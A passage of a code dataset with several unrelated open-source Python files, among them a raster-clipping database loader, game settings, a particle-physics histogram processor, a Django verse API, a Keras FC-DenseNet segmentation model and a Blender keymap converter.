print('Processing ' + fl[0])\n fname = fl[0][:-4]\n dirname = cpdLoc + '/' + rsln + '/' + fname + '/'\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n\n for site in mrds:\n siteid = str(site[2])\n imgname = fname + '_' + siteid + '.tif'\n clipd = dirname + imgname\n ds = gdal.Open(orgLoc + '/' + rsln + '/' + fl[0])\n gt = ds.GetGeoTransform()\n corners = pixel_centered_square(gt, site[1], site[0], D)\n gdal.Translate(clipd, ds, projWin = corners)\n cur.execute('execute putrasters (%s, %s, %s, %s, %s)', \n (fname, siteid, rsln, imgname, dirname))\n\n conn.commit()\n # close the communication with the PostgreSQL\n cur.close()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n print('Database connection closed.')\n\nif __name__ == '__main__':\n rasters = None\n if len(sys.argv) > 1:\n rasters = []\n for f in sys.argv[1:]:\n i = f.split('/')\n rasters.append(i[len(i) - 1])\n\n get_raster_grids(rasters)\n","repo_name":"AkashPushkar/physical-mine-prediction","sub_path":"dataset_creation/load_rasters.py","file_name":"load_rasters.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22178526776","text":"class Settings():\r\n \"\"\"A class to store all settings for Alien Invasion.\"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"Initialize the game's static settings.\"\"\"\r\n # Screen settings\r\n self.screen_width = 1200\r\n self.screen_height = 800\r\n self.bg_color = (135, 206, 235)\r\n \r\n # Ship settings\r\n self.ship_speed_factor = 1.5\r\n self.ship_limit = 3\r\n\r\n # Bullet settings\r\n self.bullet_speed_factor = 1\r\n self.bullet_width = 5\r\n self.bullet_height = 15\r\n self.bullet_color = 21, 71, 52\r\n self.bullets_allowed = 3\r\n\r\n # Alien settings\r\n self.alien_speed_factor = 1\r\n self.fleet_drop_speed = 7\r\n self.fleet_direction = 1 # 1 = right, -1 = left\r\n\r\n # How quickly the game speeds up\r\n self.speedup_scale = 1.1\r\n # How quickly the alien point values increase\r\n self.score_scale = 1.5\r\n\r\n self.initialize_dynamic_settings()\r\n\r\n def initialize_dynamic_settings(self):\r\n \"\"\"Initialize settings that change throughout the game\"\"\"\r\n self.ship_speed_factor = 1.5\r\n self.bullet_speed_factor = 1\r\n self.alien_speed_factor = 1\r\n\r\n self.fleet_drection = 1 # 1 is right, -1 is left\r\n\r\n # Scoring\r\n self.caster_points = 14\r\n self.melee_points = 21\r\n self.cannon_points = 60\r\n\r\n def increase_speed(self):\r\n \"\"\"Increase speed settings\"\"\"\r\n self.ship_speed_factor *= self.speedup_scale\r\n self.bullet_speed_factor *= self.speedup_scale\r\n self.alien_speed_factor *= self.speedup_scale\r\n\r\n self.caster_points = int(self.caster_points * self.score_scale)\r\n self.melee_points = int(self.melee_points * self.score_scale)\r\n self.cannon_points = int(self.cannon_points * self.score_scale)","repo_name":"chavvy/alien-invasion","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20809967828","text":"#!/usr/bin/env python\nimport coffea\nimport numpy as np\nimport awkward as ak\nnp.seterr(divide='ignore', invalid='ignore', over='ignore')\nfrom coffea import hist, processor\nfrom coffea.analysis_tools import PackedSelection\nfrom coffea.lumi_tools import LumiMask\n\nfrom topcoffea.modules.objects import *\nfrom topcoffea.modules.corrections import AttachMuonSF, AttachElectronSF, AttachPerLeptonFR\nfrom topcoffea.modules.selection import *\nfrom topcoffea.modules.paths import topcoffea_path\n\n# Check if the values in an array are within a given range\ndef in_range_mask(in_var,lo_lim=None,hi_lim=None):\n\n # Make sure at least one of the cuts is not none\n if (lo_lim is None) and (hi_lim is None):\n raise Exception(\"Error: No cuts specified\")\n\n # Check if the value is greater than the min\n if lo_lim is not None:\n above_min = (in_var > lo_lim)\n else:\n above_min = (ak.ones_like(in_var)==1)\n\n # Check if the value is less than or equal to the max\n if hi_lim is not None:\n below_max = (in_var <= hi_lim)\n else:\n below_max = (ak.ones_like(in_var)==1)\n\n # Return the mask\n return ak.fill_none((above_min & below_max),False)\n\n\nclass AnalysisProcessor(processor.ProcessorABC):\n\n def __init__(self, samples, dtype=np.float32):\n\n self._samples = samples\n self._dtype = dtype\n\n # Create the histograms\n self._accumulator = processor.dict_accumulator({\n \"invmass\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"invmass\", \"$m_{\\ell\\ell}$ (GeV) \", 100, 50, 150)),\n \"njets\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"njets\", \"njets\", 8, 0, 8)),\n \"l0pt\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"l0pt\", \"l0pt\", 20, 0, 200)),\n \"l0eta\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"l0eta\", \"l0eta\", 20, -2.5, 2.5)),\n \"l1pt\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"l1pt\", \"l1pt\", 20, 0, 200)),\n \"l1eta\" : hist.Hist(\"Events\", hist.Cat(\"sample\", \"sample\"), hist.Cat(\"channel\", \"channel\"), hist.Bin(\"l1eta\", \"l1eta\", 20, -2.5, 2.5)),\n })\n\n @property\n def accumulator(self):\n return self._accumulator\n\n @property\n def columns(self):\n return self._columns\n\n # Main function: run on a given dataset\n def process(self, events):\n\n # Dataset parameters\n dataset = events.metadata[\"dataset\"]\n isData = self._samples[dataset][\"isData\"]\n histAxisName = self._samples[dataset][\"histAxisName\"]\n year = self._samples[dataset][\"year\"]\n xsec = self._samples[dataset][\"xsec\"]\n sow = self._samples[dataset][\"nSumOfWeights\"]\n\n datasets = [\"SingleMuon\", \"SingleElectron\", \"EGamma\", \"MuonEG\", \"DoubleMuon\", \"DoubleElectron\", \"DoubleEG\"]\n for d in datasets:\n if d in dataset: dataset = dataset.split('_')[0]\n\n # Set the sampleType (used for MC matching requirement)\n # Does not really matter for this processor, but still need to pass it to the selection function anyway\n conversionDatasets=[x%y for x in ['TTGJets_centralUL%d'] for y in [16,17,18]]\n nonpromptDatasets =[x%y for x in ['TTJets_centralUL%d','DY50_centralUL%d','DY10to50_centralUL%d','tbarW_centralUL%d','tW_centralUL%d','tbarW_centralUL%d'] for y in [16,17,18]]\n sampleType = 'prompt'\n if isData:\n sampleType = 'data'\n elif dataset in conversionDatasets:\n sampleType = 'conversions'\n elif dataset in nonpromptDatasets:\n sampleType = 'nonprompt'\n\n # Initialize objects\n met = events.MET\n e = events.Electron\n mu = events.Muon\n jets = events.Jet\n\n e[\"idEmu\"] = ttH_idEmu_cuts_E3(e.hoe, e.eta, e.deltaEtaSC, e.eInvMinusPInv, e.sieie)\n e[\"conept\"] = coneptElec(e.pt, e.mvaTTHUL, e.jetRelIso)\n mu[\"conept\"] = coneptMuon(mu.pt, mu.mvaTTHUL, mu.jetRelIso, mu.mediumId)\n e[\"btagDeepFlavB\"] = ak.fill_none(e.matched_jet.btagDeepFlavB, -99)\n mu[\"btagDeepFlavB\"] = ak.fill_none(mu.matched_jet.btagDeepFlavB, -99)\n\n if not isData:\n e[\"gen_pdgId\"] = e.matched_gen.pdgId\n mu[\"gen_pdgId\"] = mu.matched_gen.pdgId\n e[\"gen_parent_pdgId\"] = e.matched_gen.distinctParent.pdgId\n mu[\"gen_parent_pdgId\"] = mu.matched_gen.distinctParent.pdgId\n e[\"gen_gparent_pdgId\"] = e.matched_gen.distinctParent.distinctParent.pdgId\n mu[\"gen_gparent_pdgId\"] = mu.matched_gen.distinctParent.distinctParent.pdgId\n\n # Get the lumi mask for data\n if year == \"2016\" or year == \"2016APV\":\n golden_json_path = topcoffea_path(\"data/goldenJsons/Cert_271036-284044_13TeV_Legacy2016_Collisions16_JSON.txt\")\n elif year == \"2017\":\n golden_json_path = topcoffea_path(\"data/goldenJsons/Cert_294927-306462_13TeV_UL2017_Collisions17_GoldenJSON.txt\")\n elif year == \"2018\":\n golden_json_path = topcoffea_path(\"data/goldenJsons/Cert_314472-325175_13TeV_Legacy2018_Collisions18_JSON.txt\")\n else:\n raise ValueError(f\"Error: Unknown year \\\"{year}\\\".\")\n lumi_mask = LumiMask(golden_json_path)(events.run,events.luminosityBlock)\n\n\n ################### Object selection ####################\n\n # Electron selection\n e[\"isPres\"] = isPresElec(e.pt, e.eta, e.dxy, e.dz, e.miniPFRelIso_all, e.sip3d, getattr(e,\"mvaFall17V2noIso_WPL\"))\n e[\"isLooseE\"] = isLooseElec(e.miniPFRelIso_all,e.sip3d,e.lostHits)\n e[\"isFO\"] = isFOElec(e.pt, e.conept, e.btagDeepFlavB, e.idEmu, e.convVeto, e.lostHits, e.mvaTTHUL, e.jetRelIso, e.mvaFall17V2noIso_WP90, year)\n e[\"isTightLep\"] = tightSelElec(e.isFO, e.mvaTTHUL)\n # Muon selection\n mu[\"isPres\"] = isPresMuon(mu.dxy, mu.dz, mu.sip3d, mu.eta, mu.pt, mu.miniPFRelIso_all)\n mu[\"isLooseM\"] = isLooseMuon(mu.miniPFRelIso_all,mu.sip3d,mu.looseId)\n mu[\"isFO\"] = isFOMuon(mu.pt, mu.conept, mu.btagDeepFlavB, mu.mvaTTHUL, mu.jetRelIso, year)\n mu[\"isTightLep\"]= tightSelMuon(mu.isFO, mu.mediumId, mu.mvaTTHUL)\n # Build loose collections\n m_loose = mu[mu.isPres & mu.isLooseM]\n e_loose = e[e.isPres & e.isLooseE]\n l_loose = ak.with_name(ak.concatenate([e_loose, m_loose], axis=1), 'PtEtaPhiMCandidate')\n\n # Compute pair invariant masses, for all flavors all signes\n llpairs = ak.combinations(l_loose, 2, fields=[\"l0\",\"l1\"])\n events[\"minMllAFAS\"] = ak.min( (llpairs.l0+llpairs.l1).mass, axis=-1)\n\n # Build FO collection\n m_fo = mu[mu.isPres & mu.isLooseM & mu.isFO]\n e_fo = e[e.isPres & e.isLooseE & e.isFO]\n\n # Attach the lepton SFs to the electron and muons collections (the event selection expect these to be present)\n AttachElectronSF(e_fo,year=year)\n AttachMuonSF(m_fo,year=year)\n\n # Attach per lepton fake rates\n AttachPerLeptonFR(e_fo, flavor = \"Elec\", year=year)\n AttachPerLeptonFR(m_fo, flavor = \"Muon\", year=year)\n m_fo['convVeto'] = ak.ones_like(m_fo.charge)\n m_fo['lostHits'] = ak.zeros_like(m_fo.charge)\n l_fo = ak.with_name(ak.concatenate([e_fo, m_fo], axis=1), 'PtEtaPhiMCandidate')\n l_fo_conept_sorted = l_fo[ak.argsort(l_fo.conept, axis=-1,ascending=False)]\n events[\"l_fo_conept_sorted\"] = l_fo_conept_sorted\n\n # Convenient to have l0, l1, l2 on hand\n l_fo_conept_sorted_padded = ak.pad_none(l_fo_conept_sorted, 3)\n l0 = l_fo_conept_sorted_padded[:,0]\n l1 = l_fo_conept_sorted_padded[:,1]\n\n\n #################### Jets ####################\n\n # Jet cleaning, before any jet selection\n vetos_tocleanjets = ak.with_name( l_fo, \"PtEtaPhiMCandidate\")\n tmp = ak.cartesian([ak.local_index(jets.pt), vetos_tocleanjets.jetIdx], nested=True)\n cleanedJets = jets[~ak.any(tmp.slot0 == tmp.slot1, axis=-1)] # this line should go before *any selection*, otherwise lep.jetIdx is not aligned with the jet index\n\n # Selecting jets and cleaning them\n cleanedJets[\"isGood\"] = isTightJet(getattr(cleanedJets, \"pt\"), cleanedJets.eta, cleanedJets.jetId, jetPtCut=30.) # temporary at 25 for synch, TODO: Do we want 30 or 25?\n goodJets = cleanedJets[cleanedJets.isGood]\n njets = ak.num(goodJets)\n\n\n #################### Event selection ####################\n\n # The event selection\n add2lMaskAndSFs(events, year, isData, sampleType)\n addLepCatMasks(events)\n\n\n ######### Weights ###########\n\n weights_object = coffea.analysis_tools.Weights(len(events),storeIndividual=True)\n if not isData: weights_object.add(\"norm\",(xsec/sow)*events[\"genWeight\"])\n else: weights_object.add(\"norm\",np.ones_like(events[\"event\"]))\n\n # Apply the flip rate to OS as a cross check\n weights_object.add(\"fliprate\", events.flipfactor_2l)\n\n # Print info\n #print(\"id0:\",l0.pdgId)\n #print(\"pt0:\",l0.pt)\n #print(\"eta0\",l0.eta)\n #print(\"id1:\",l1.pdgId)\n #print(\"pt1:\",l1.pt)\n #print(\"eta1\",l1.eta)\n #print(events.flipfactor_2l)\n\n\n ######### Store boolean masks with PackedSelection ##########\n\n # Get mask for events that have two sf os leps close to z peak\n sfosz_2l_mask = get_Z_peak_mask(l_fo_conept_sorted_padded[:,0:2],pt_window=30.0,flavor=\"os\")\n sfssz_2l_mask = get_Z_peak_mask(l_fo_conept_sorted_padded[:,0:2],pt_window=30.0,flavor=\"ss\")\n\n # Pass trigger mask\n pass_trg = trgPassNoOverlap(events,isData,dataset,str(year))\n\n # Charge masks\n charge2l_0 = ak.fill_none(((l0.charge+l1.charge)==0),False)\n charge2l_1 = ak.fill_none(((l0.charge+l1.charge)!=0),False)\n\n # Flavor mask\n sameflav_mask = (abs(l0.pdgId) == abs(l1.pdgId))\n\n # MC truth for flips\n #flip_l0 = (l0.gen_pdgId == -l0.pdgId)\n #flip_l1 = (l1.gen_pdgId == -l1.pdgId)\n #noflip_l0 = (l0.gen_pdgId == l0.pdgId)\n #noflip_l1 = (l1.gen_pdgId == l1.pdgId)\n #isprompt_2l = ( ((l0.genPartFlav==1) | (l0.genPartFlav == 15)) & ((l1.genPartFlav==1) | (l1.genPartFlav == 15)) )\n #truth_flip_mask = (isprompt_2l & (flip_l0 | flip_l1) & ~(flip_l0 & flip_l1)) # One or the other flips, but not both\n #truth_noflip_mask = (isprompt_2l & noflip_l0 & noflip_l1) # Neither flips\n\n # Selections\n selections = PackedSelection(dtype='uint64')\n selections.add(\"is_good_lumi\",lumi_mask)\n selections.add(\"os\", (charge2l_0))\n selections.add(\"ss\", (charge2l_1))\n selections.add(\"osz\", (charge2l_0 & sfosz_2l_mask))\n selections.add(\"ssz\", (charge2l_1 & sfssz_2l_mask))\n selections.add(\"2e\", (events.is2l_nozeeveto & events.is2l_SR & events.is_ee & (njets<4) & pass_trg))\n #if not isData:\n #selections.add(\"sszTruthFlip\", (charge2l_1 & sfssz_2l_mask & truth_flip_mask))\n #selections.add(\"oszTruthNoFlip\", (charge2l_0 & sfosz_2l_mask & truth_noflip_mask))\n #selections.add(\"ssTruthFlip\", (charge2l_1 & truth_flip_mask))\n #selections.add(\"osTruthNoFlip\", (charge2l_0 & truth_noflip_mask))\n\n\n ######### Variables for the dense and sparse axes of the hists ##########\n\n dense_var_dict = {\n \"invmass\" : (l0+l1).mass,\n \"njets\" : njets,\n \"l0pt\" : l0.pt,\n \"l0eta\" : l0.eta,\n \"l1pt\" : l1.pt,\n \"l1eta\" : l1.eta,\n }\n\n print(l0.pt)\n print(l1.eta)\n\n ########## Fill the histograms ##########\n\n hout = self.accumulator.identity()\n\n # Set the list of channels to loop over\n chan_lst = [\"osz\",\"ssz\"]\n #if not isData: chan_lst.append(\"sszTruthFlip\")\n #if not isData: chan_lst.append(\"sszTruthFlip2\")\n #chan_lst = [\"ss\",\"os\",\"ssz\",\"osz\",\"ssTruthFlip\",\"osTruthNoFlip\",\"sszTruthFlip\",\"oszTruthNoFlip\"]\n\n # Loop over histograms to fill (just invmass, njets for now)\n for dense_axis_name, dense_axis_vals in dense_var_dict.items():\n\n # Loop over the lepton channels\n for chan_name in chan_lst:\n\n # Get the cut mask object\n cuts_lst = [\"2e\"]\n cuts_lst.append(chan_name)\n if isData: cuts_lst.append(\"is_good_lumi\")\n cuts_mask = selections.all(*cuts_lst)\n\n # Fill the histo\n axes_fill_info_dict = {\n dense_axis_name : dense_axis_vals[cuts_mask],\n \"channel\" : chan_name,\n \"sample\" : histAxisName,\n \"weight\" : weights_object.weight()[cuts_mask],\n }\n\n hout[dense_axis_name].fill(**axes_fill_info_dict)\n\n return hout\n\n def postprocess(self, accumulator):\n return accumulator\n","repo_name":"TopEFT/topeft","sub_path":"analysis/flip_measurement/flip_ar_processor.py","file_name":"flip_ar_processor.py","file_ext":"py","file_size_in_byte":13185,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"2675378491","text":"\nfrom tensorflow.keras import Model\nimport numpy as np\nimport string\nalphabet = list(string.ascii_uppercase)\n\n\ndef predict(model: Model, X_pred: np.ndarray) -> np.ndarray:\n print(\"Predicting\")\n y = model.predict(X_pred, verbose=False)\n print(f\"Predicted shape {y.shape}\")\n predicted_classes = np.argmax(y, axis=1)\n print(\"Predicted classes\", predicted_classes)\n predicted_letters = np.array(\n [alphabet[predicted_class] for predicted_class in predicted_classes])\n print(\"Predicted letters\", predicted_letters)\n return predicted_letters\n","repo_name":"cpsnowden/swordle","sub_path":"sign_game/ml/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38864341229","text":"from builtins import len, int\nfrom django.shortcuts import render, get_object_or_404\n\n# Create your views here.\nfrom rest_framework.decorators import list_route\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\n\nfrom verses.models import Verse\nfrom verses.serializers import VerseSerializer\n\n\nclass VerseViewSet(ViewSet):\n \"\"\"\n A simple ViewSet for listing or retrieving users.\n \"\"\"\n\n def list(self, request):\n queryset = Verse.objects.all()\n serializer = VerseSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Verse.objects.all()\n verse = get_object_or_404(queryset, pk=pk)\n serializer = VerseSerializer(verse)\n return Response(serializer.data)\n\n @list_route(methods=['GET'])\n def filter(self, request):\n gospel_key = request.query_params.get('gospel_key')\n magic_number = int(request.query_params.get('magic_number'))\n\n queryset = Verse.objects.filter(gospel=gospel_key)\n len_queryset = len(queryset)\n index = int(magic_number/len_queryset)\n\n if index > len_queryset:\n index = int(index/len_queryset)\n\n serializer = VerseSerializer(queryset[index])\n return Response(serializer.data)\n","repo_name":"jeancsanchez/Who-is-Jesus-Backend","sub_path":"verses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35621382199","text":"from keras.models import Model\nfrom keras.layers.core import Activation, Dropout, Activation, Reshape\nfrom keras.layers.convolutional import Convolution2D, Deconvolution2D\nfrom keras.layers.pooling import AveragePooling2D\nfrom keras.layers import Input, merge\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.regularizers import l2\nimport keras.backend as K\n\nfrom layers import SubPixelUpscaling\nimport json\n\nclass Tiramisu():\n\n\n\n def __init__(self, nb_classes, img_dim, nb_dense_block=5, growth_rate=12, nb_filter=16, nb_layers=4, upsampling_conv=128,\n bottleneck=False, reduction=0.0, dropout_rate=None, weight_decay=1E-4, upscaling_type='deconv',\n verbose=True):\n\n self.nb_classes=nb_classes\n self.img_dim=img_dim\n self.nb_dense_block=nb_dense_block\n self.growth_rate=growth_rate\n self.nb_filter=nb_filter\n self.nb_layers=nb_layers\n self.upsampling_conv=upsampling_conv\n self.bottleneck=bottleneck\n self.reduction=reduction\n self.dropout_rate=dropout_rate\n self.weight_decay=weight_decay\n self.upscaling_type=upscaling_type\n self.verbose=verbose\n self.create()\n\n def conv_block(self, input_tensor, nb_filter, bottleneck=False, dropout_rate=None, weight_decay=1E-4):\n ''' Apply BatchNorm, Relu 3x3, Conv2D, optional bottleneck block and dropout\n\n Args:\n input_tensor: Input keras tensor\n nb_filter: number of filters\n bottleneck: add bottleneck block\n dropout_rate: dropout rate\n weight_decay: weight decay factor\n\n Returns: keras tensor with batch_norm, relu and convolution2d added (optional bottleneck)\n\n '''\n\n concat_axis = 1\n\n x = BatchNormalization(mode=0, axis=concat_axis, gamma_regularizer=l2(weight_decay),\n beta_regularizer=l2(weight_decay))(input_tensor)\n x = Activation('relu')(x)\n\n if bottleneck:\n inter_channel = nb_filter * 4 # Obtained from https://github.com/liuzhuang13/DenseNet/blob/master/densenet.lua\n\n x = Convolution2D(inter_channel, 1, 1, init='he_uniform', border_mode='same', bias=False,\n W_regularizer=l2(weight_decay))(x)\n\n if dropout_rate:\n x = Dropout(dropout_rate)(x)\n\n x = BatchNormalization(mode=0, axis=concat_axis, gamma_regularizer=l2(weight_decay),\n beta_regularizer=l2(weight_decay))(x)\n x = Activation('relu')(x)\n\n x = Convolution2D(nb_filter, 3, 3, init=\"he_uniform\", border_mode=\"same\", bias=False,\n W_regularizer=l2(weight_decay))(x)\n if dropout_rate:\n x = Dropout(dropout_rate)(x)\n\n return x\n\n\n def transition_down_block(self, input_tensor, nb_filter, compression=1.0, dropout_rate=None, weight_decay=1E-4):\n ''' Apply BatchNorm, Relu 1x1, Conv2D, optional compression, dropout and Maxpooling2D\n\n Args:\n input_tensor: keras tensor\n nb_filter: number of filters\n dropout_rate: dropout rate\n weight_decay: weight decay factor\n\n Returns: keras tensor, after applying batch_norm, relu-conv, dropout, maxpool\n\n '''\n\n concat_axis = 1\n\n x = BatchNormalization(mode=0, axis=concat_axis, gamma_regularizer=l2(weight_decay),\n beta_regularizer=l2(weight_decay))(input_tensor)\n x = Activation('relu')(x)\n x = Convolution2D(int(nb_filter * compression), 1, 1, init=\"he_uniform\", border_mode=\"same\", bias=False,\n W_regularizer=l2(weight_decay))(x)\n if dropout_rate:\n x = Dropout(dropout_rate)(x)\n x = AveragePooling2D((2, 2), strides=(2, 2))(x)\n\n return x\n\n\n def transition_up_block(self, input_tensor, nb_filters, type='deconv', output_shape=None, weight_decay=1E-4):\n ''' deconv Upscaling (factor = 2)\n\n Args:\n input_tensor: keras tensor\n nb_filters: number of layers\n type:'deconv'. Determines type of upsampling performed\n output_shape: required if type = 'deconv'. Output shape of tensor\n weight_decay: weight decay factor\n\n Returns: keras tensor, after applying batch_norm, relu-conv, dropout, maxpool\n\n '''\n\n\n x = Deconvolution2D(nb_filters, 3, 3, output_shape, activation='relu', border_mode='same',\n subsample=(2, 2))(input_tensor)\n\n\n\n def dense_block(self, x, nb_layers, nb_filter, growth_rate, bottleneck=False, dropout_rate=None, weight_decay=1E-4):\n ''' Build a dense_block where the output of each conv_block is fed to subsequent ones\n\n Args:\n x: keras tensor\n nb_layers: the number of layers of conv_block to append to the model.\n nb_filter: number of filters\n growth_rate: growth rate\n bottleneck: bottleneck block\n dropout_rate: dropout rate\n weight_decay: weight decay factor\n\n Returns: keras tensor with nb_layers of conv_block appended\n\n '''\n\n concat_axis = 1\n\n feature_list = [x]\n\n for i in range(nb_layers):\n x = self.conv_block(x, growth_rate, bottleneck, dropout_rate, weight_decay)\n feature_list.append(x)\n x = merge(feature_list, mode='concat', concat_axis=concat_axis)\n nb_filter += growth_rate\n\n return x, nb_filter\n\n\n def create(self):\n ''' Build the create_dense_net model\n\n Args:\n nb_classes: Number of classes\n img_dim: tuple of shape (channels, rows, columns) or (rows, columns, channels)\n depth: number or layers\n nb_dense_block: number of dense blocks to add to end (generally = 3)\n growth_rate: number of filters to add per dense block\n nb_filter: initial number of filters. Setting -1 indicates initial number of filters is 2 * growth_rate\n nb_layers: number of layers in each dense block. Can be an -1, a positive integer or a list\n\n If -1, it computes the nb_layer from depth\n\n If positive integer, a set number of layers per dense block\n\n If list, nb_layer is used as provided.\n Note that list size must be (nb_dense_block + 1)\n\n upsampling_conv: number of convolutional layers in upsampling via subpixel convolution\n bottleneck: add bottleneck blocks\n reduction: reduction factor of transition blocks. Note : reduction value is inverted to compute compression\n dropout_rate: dropout rate\n weight_decay: weight decay\n upscaling_type: method of upscaling. Can be 'subpixel' or 'deconv'\n verbose: print the model type\n\n Returns: keras tensor with nb_layers of conv_block appended\n\n '''\n\n batch_size = None\n\n model_input = Input(shape=self.img_dim)\n\n concat_axis = 1\n\n _, rows, cols = self.img_dim\n\n\n if self.reduction != 0.0:\n assert self.reduction <= 1.0 and self.reduction > 0.0, \"reduction value must lie between 0.0 and 1.0\"\n\n # check if upsampling_conv has minimum number of filters\n # minimum is set to 12, as at least 3 color channels are needed for correct upsampling\n assert self.upsampling_conv > 12 and self.upsampling_conv % 4 == 0, \"upsampling_conv number of channels must \" \\\n \"be a positive number divisible by 4 and greater \" \\\n \"than 12\"\n\n\n\n # layers in each dense block\n if type(self.nb_layers) is list or type(self.nb_layers) is tuple:\n self.nb_layers = list(nb_layers) # Convert tuple to list\n\n assert len(self.nb_layers) == (self.nb_dense_block + 1), \"If list, nb_layer is used as provided. \" \\\n \"Note that list size must be (nb_dense_block + 1)\"\n\n final_nb_layer = self.nb_layers[-1]\n self.nb_layers = self.nb_layers[:-1]\n\n else:\n final_nb_layer = self.nb_layers\n self.nb_layers = [self.nb_layers] * self.nb_dense_block\n\n if self.bottleneck:\n self.nb_layers = [int(layer // 2) for layer in self.nb_layers]\n\n # compute initial nb_filter if -1, else accept users initial nb_filter\n if self.nb_filter <= 0:\n self.nb_filter = 2 * self.growth_rate\n\n # compute compression factor\n compression = 1.0 - self.reduction\n\n # Initial convolution\n x = Convolution2D(48, 3, 3, init=\"he_uniform\", border_mode=\"same\", name=\"initial_conv2D\", bias=False,\n W_regularizer=l2(self.weight_decay))(model_input)\n\n skinput_tensor_connection = x\n skinput_tensor_list = []\n\n # Add dense blocks and transition down block\n for block_idx in range(self.nb_dense_block):\n x, nb_filter = self.dense_block(x, self.nb_layers[block_idx], self.nb_filter, self.growth_rate, bottleneck=self.bottleneck,\n dropout_rate=self.dropout_rate, weight_decay=self.weight_decay)\n\n # Skinput_tensor connection\n x = merge([x, skinput_tensor_connection], mode='concat', concat_axis=concat_axis)\n skinput_tensor_list.append(x)\n\n # add transition_block\n x = self.transition_down_block(x, nb_filter, compression=compression, dropout_rate=self.dropout_rate,\n weight_decay=self.weight_decay)\n nb_filter = int(nb_filter * compression)\n\n # Preserve transition for next skinput_tensor connection after dense\n skinput_tensor_connection = x\n\n # The last dense_block does not have a transition_down_block\n x, nb_filter = self.dense_block(x, final_nb_layer, nb_filter, self.growth_rate, bottleneck=self.bottleneck,\n dropout_rate=self.dropout_rate, weight_decay=self.weight_decay)\n\n out_shape = [batch_size, nb_filter, rows // 16, cols // 16]\n\n # Add dense blocks and transition up block\n for block_idx in range(self.nb_dense_block):\n x = self.transition_up_block(x, nb_filters=self.upsampling_conv, type=self.upscaling_type, output_shape=out_shape)\n\n out_shape[2] *= 2\n out_shape[3] *= 2\n\n\n x = merge([x, skinput_tensor_list.pop()], mode='concat', concat_axis=concat_axis)\n\n x, nb_filter = self.dense_block(x, self.nb_layers[-block_idx], nb_filter, growth_rate, bottleneck=self.bottleneck,\n dropout_rate=self.dropout_rate, weight_decay=self.weight_decay)\n\n x = Convolution2D(nb_classes, 1, 1, activation='linear', border_mode='same', W_regularizer=l2(self.weight_decay),\n bias=False)(x)\n\n channel, row, col = self.img_dim\n\n\n x = Reshape((row * col, self.nb_classes))(x)\n\n x = Activation('softmax')(x)\n\n densenet = Model(input=model_input, output=x, name=\"create_dense_net\")\n\n # Compute depth\n nb_conv_layers = len([layer.name for layer in densenet.layers\n if layer.__class__.__name__ == 'Convolution2D'])\n\n depth = nb_conv_layers - self.nb_dense_block # For 1 extra convolution layers per transition up\n\n if self.verbose: print('Total number of convolutions', depth)\n\n if self.verbose:\n if self.bottleneck and not self.reduction:\n print(\"Bottleneck DenseNet-B-%d-%d created.\" % (depth, self.growth_rate))\n elif not self.bottleneck and self.reduction > 0.0:\n print(\"DenseNet-C-%d-%d with %0.1f compression created.\" % (depth, self.growth_rate, compression))\n elif self.bottleneck and self.reduction > 0.0:\n print(\"Bottleneck DenseNet-BC-%d-%d with %0.1f compression created.\" % (depth, self.growth_rate, compression))\n else:\n print(\"DenseNet-%d-%d created.\" % (depth, self.growth_rate))\n\n return densenet\n\n\n\nnb_layers = [4, 5, 7, 10, 12, 15]\nmodel = Tiramisu(nb_classes=12,img_dim=(3, 224, 224), nb_layers=nb_layers)\nmodel.summary()\n\nwith open('tiramisu_fc_dense103_model.json', 'w') as outfile:\n outfile.write(json.dumps(json.loads(model.to_json()), indent=3))","repo_name":"0bserver07/One-Hundred-Layers-Tiramisu","sub_path":"fc-densenet-model.py","file_name":"fc-densenet-model.py","file_ext":"py","file_size_in_byte":12596,"program_lang":"python","lang":"en","doc_type":"code","stars":198,"dataset":"github-code","pt":"54"} +{"seq_id":"14936508848","text":"\"\"\"\nLittle script to convert blender keymaps to different keyboard layouts.\nCurrently only designed to replace letter keys and ;. \n\"\"\"\n\nimport re\n\ninput_kmp_path = \"blender_qwerty_keymap.py\" # source keymap file location\noutput_kmp_path = \"blender_colemakdh_keymap.py\" # output keymap file location\n\nsource_chars = \"QWERTYUIOPASDFGHJKL;ZXCVBNM\" # keys to replace\ntarget_chars = \"QWFPBJLUY;ARSTGMNEIOZXCDVKH\" # keys to replace with (in the same order)\n\nspecial_chars = {\n ';': 'SEMI_COLON',\n}\n\ndef chars_to_kmp(chars):\n kmp = []\n for i in chars:\n if i in special_chars.keys():\n i = special_chars[i]\n kmp.append(i)\n \n return kmp\n\nsource_kmp = chars_to_kmp(source_chars)\ntarget_kmp = chars_to_kmp(target_chars)\nprint(source_kmp)\n\ndef replace_key(match_obj):\n if match_obj.group(1) in source_kmp:\n return re.sub(r\"\\'.\\'\", f\"\\'{target_kmp[source_kmp.index(match_obj.group(1))]}\\'\", match_obj.group(0))\n\nwith open(input_kmp_path, 